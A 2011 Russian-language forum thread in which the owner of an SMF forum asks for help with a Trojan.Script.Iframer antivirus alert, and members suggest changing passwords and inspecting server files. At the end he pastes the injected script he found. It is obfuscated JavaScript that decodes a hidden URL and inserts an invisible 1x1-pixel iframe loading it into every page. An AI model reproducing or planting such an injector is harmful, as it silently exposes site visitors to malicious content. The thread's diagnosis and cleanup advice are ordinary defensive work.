На форуме SMF вирус - Trojan.Script.Iframer

Автор STRIJ, 06-12-2011, 20:52:22

« назад - далее »

STRIJTopic starter

Откуда-то взялся на форуме данный вирус, подозреваю, человека, который имел доступ к форуму. Теперь при открытии любой темы, антивирус ругается, так же при открытии разделов в админке... ВОт скрин -



ЧТо делать, подскажите... где искать заразу? И что предпринимать в связи с этим?


Michael J Fox

Мой КИСС молчит по этому поводу.


Sevab

На каком форуме Саша?
Кто бы не имел доступ, срочно меняй все пароли на сервере, проверяй файлы (особенно яваскрипт) на сервере, и чисти компьютер.
Вполне могли и через твой попасть.

Если пользуешься фтп менеджером (любым) не оставляй поле пароля заполненным (вводи вручную или копируй с секретного файла).

STRIJTopic starter

Sevab,

Игорь, ссылку не хочу тут давать, чтобы случайно не поймали чего, посмотри, ссылка на форум есть на скриншоте.

bumer

полазил по форуму http://chessburg.ru/forum аваст никаких троянов не нашел.
Незнаешь делать или не делать. Сделай!
  •  


RockYou

Delorean,

мой KIS 2012 тоже не ругается вообще, с ноутбука Norton тоже молчит. Но в любом случае, лучше обезопасить и провести чистку...

STRIJTopic starter

Цитата: bumer от 06-12-2011, 21:07:40
полазил по форуму http://chessburg.ru/forum аваст никаких троянов не нашел.

Читал про этот вирус, что может быть и не вирус, а какой-то скрипт детектируется как вирус, но может быть и вирусом, который собирает пароли...

Добавлено: 06-12-2011, 21:12:13


Цитата: RockYou от 06-12-2011, 21:09:46провести чистку...

Как лучше првоерить вайлы на сервере? Скачать на локалку и там уже антивирусником? Или как? Подскажите.

Sevab

Посмотри что грузит страница (исходник) и проверяй все составляющие.
Это могут быть js файлы, либо сама страница собирается из разных частей. Все проверяй досконально (вручную).
Наверняка заметишь подозрительный код.


bumer

попробуй в тотал командере найти вот это HEUR:Trojan.Script.Iframer если это хоть даже фаил или строка он все равно найдет.
Незнаешь делать или не делать. Сделай!
  •  


STRIJTopic starter

Вот такой код на главной форума в самом конце кода -

<!-- . --><script type="text/javascript">function nivrZ(){var ODxCiO='QTzDlT';if('qgzC'=='ZYOyY')fuKPFL();}if('jlRv'=='kCpaks')qvBv='UJvVh';function Ayame(){}function smao(){var iOKF='BGEkXS';if('prcw'=='HQCt')QqGfI();}
var cyPkQG="pars\x65Int";if('rlxp'=='HnVdp')psEi();var JTbFBdl="\x73lice";function vgRXfZ(){var MAck='fxLz';if('ZXGGT'=='cPXc')fTHSI();}var bZFrQ='HmRBg';var APZsfNN="929e9e9a645959958b9c969395a496999e99918f9e928f9c588d9997599d5a599398588d9193695b5a";function SnUc(){var BTVhzC='zwGAB';if('emZxFI'=='WFnQR')FtDC();}
var FgNSRa="fro\x6dCharCo\x64e";var eqOti=223;if('IpmeS'=='LkpDR')cApRp='DvOgPv';var ZgCvD;function ySEir(){var mJbfa='RKBNQg';if('puIV'=='DVHJq')GvDvbb();}
var UXcClKfW="";function nZBF(){}function VJPQOK(){}
var uhyAuA=(function(){if('wfZXm'=='ISRTwP')DRnXBQ();return this;function RliJO(){}var riDo='czizo';})();if('EREg'=='lJcrdN')TwHct();function yNaWsF(){var kBRrrg='qSPl';if('xwQxHq'=='bzBMwh')xeVMz();}
var dFPOEBQ="c\x6fns\x74ru\x63t\x6fr";var UJleNT=83;var gsWih=42;var yhtxAvV="siGwwBP"[dFPOEBQ];if('AEtY'=='VmFkOS')udRBI='gJRe';if('nuYR'=='DIJGs')uIan();function USQmt(){}
for(var DQzKKpM=0;DQzKKpM<APZsfNN.length;DQzKKpM+=2){yNxrQn=uhyAuA[cyPkQG](APZsfNN[JTbFBdl](DQzKKpM,DQzKKpM+2),16)-42;UXcClKfW+=yhtxAvV[FgNSRa](yNxrQn);if('IKQekT'=='GbYrCh')sqqI();}
if('pziD'=='nCXw')wZuYGV='JRME';function AeRnG(){}if('ipReFx'=='qvAMzX')UITkS='RDoAF';var OJlEPajVV="KyMdgd";var Adsg='OKSHrl';var rqVt;var DqoGelc=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+OJlEPajVV+'" src="'+"UXcClKfW"+'">':'iframe';function buFYlw(){}
var FYiEdo=document.createElement(DqoGelc);FYiEdo.name=OJlEPajVV;var VSyIt;FYiEdo.setAttribute("name",OJlEPajVV);var wPrmDD;FYiEdo.id=OJlEPajVV;FYiEdo.src=UXcClKfW;if('qyWzj'=='SHMw')SbIw();var OQQX;function GJDjAW(){var eYgo='iNKI';if('BsrM'=='fxtXFU')Kvwzhi();}
FYiEdo.style.right="0px";function lQsnU(){var jWxh='AyTbR';if('jUGmaz'=='AzRQWh')CustY();}
FYiEdo.style.top="0px";if('wdMPx'=='rtWL')WxolI();function eSlE(){}
FYiEdo.style.height="1px"
if('ejGtqC'=='RILl')VPrF();function Coanh(){}if('Lzlfhh'=='zWkr')iGDQ='TnYRGF';FYiEdo.style.width="1px";function bZYwS(){var yvZY='qAOrdx';if('umodI'=='oPJJds')yShf();}function lLjNK(){var zMCTAn='pLBu';if('JQuOJ'=='aLNz')QXljHZ();}var CuWn='SSJu';FYiEdo.style.position="absolute";var pACt=173;if('ABPWm'=='LJZPpb')Ifgw();function TWXup(){function NckY(){}
if(document.body){if('CurXr'=='alak')YWWD='jyCuRT';if('STCXW'=='JSGKKv')TAAWQu='yfede';function GrQKII(){var cMGEpk='LBsWg';if('epQd'=='himN')fLUHP();}
document.body.appendChild(FYiEdo);if('VFzZ'=='gTBGC')yKrk();if('qnOH'=='Xysp')sZmG='qjYarK';}else{var GzkLx;var QnPt;setTimeout(TWXup,100);if('SIEyek'=='eUvY')GyVKAw();}
var ysjH=104;}
if('evhht'=='HTdg')XuTNqN='ArTT';if('seVTf'=='ewkYo')Cajnt();TWXup();function cbUCDI(){var yzKbhO='qIrRxy';if('uXUVD'=='eoAE')bquJ();}var azMf=256;function WQKNr(){}</script><!-- . -->


Что это?*